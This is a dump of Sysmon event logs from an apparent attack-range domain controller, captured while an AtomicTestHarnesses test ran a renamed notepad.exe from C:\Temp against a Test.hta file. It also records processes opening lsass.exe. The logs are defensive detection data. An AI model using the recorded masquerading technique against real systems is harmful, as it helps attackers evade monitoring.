16:03:51.936{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029800Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:51.936{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029799Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:51.936{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029798Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:51.936{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029797Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:51.936{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029796Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:51.936{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029795Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:51.155{7901BC46-4987-6008-1600-00000000A301}15362116C:\Windows\system32\svchost.exe{7901BC46-5467-6008-C106-00000000A301}5872C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029794Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:51.155{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5467-6008-C106-00000000A301}5872C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029793Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:51.124{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-5467-6008-C106-00000000A301}5872C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029792Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:51.124{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-5467-6008-C106-00000000A301}5872C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000029791Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:51.077{7901BC46-5467-6008-C106-00000000A301}5872C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_25lfqllw.ouy.ps12021-01-20 16:03:51.077 10341000x800000000000000029790Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:51.061{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-5467-6008-C106-00000000A301}5872C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029789Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:51.014{7901BC46-4987-6008-1600-00000000A301}15362116C:\Windows\system32\svchost.exe{7901BC46-5467-6008-C206-00000000A301}8096C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029788Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:51.014{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5467-6008-C206-00000000A301}8096C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029787Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:51.014{7901BC46-5467-6008-C206-00000000A301}80965684C:\Windows\system32\conhost.exe{7901BC46-5467-6008-C106-00000000A301}5872C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029786Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:51.014{7901BC46-4A88-6008-F200-00000000A301}19124816C:\Windows\system32\csrss.exe{7901BC46-5467-6008-C206-00000000A301}8096C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000029785Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:50.999{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029784Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:50.999{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029783Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:50.999{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029782Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:50.999{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029781Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:50.999{7901BC46-4A88-6008-F200-00000000A301}19124816C:\Windows\system32\csrss.exe{7901BC46-5467-6008-C106-00000000A301}5872C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000029780Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:50.999{7901BC46-5466-6008-C006-00000000A301}56325760C:\Temp\notepad.exe{7901BC46-5467-6008-C106-00000000A301}5872C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\shell32.dll+8d42f|C:\Windows\System32\shell32.dll+8d2bc|C:\Windows\System32\shell32.dll+6b47e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000029779Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:51.009{7901BC46-5467-6008-C106-00000000A301}5872C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -Command Write-Host c0ea733d-d021-4ce6-b62e-0c76740c3751; Start-Sleep -Seconds 2; exitC:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{7901BC46-5466-6008-C006-00000000A301}5632C:\Temp\notepad.exe"C:\Temp\notepad.exe" "C:\Users\Administrator\Downloads\AtomicTestHarnesses-master\AtomicTestHarnesses-master\TestHarnesses\Test.hta" 10341000x800000000000000029905Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:52.186{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5467-6008-C206-00000000A301}8096C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029904Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:52.186{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5467-6008-C106-00000000A301}5872C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029903Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:52.186{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5466-6008-C006-00000000A301}5632C:\Temp\notepad.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029902Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:52.186{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-53D1-6008-A006-00000000A301}4404C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\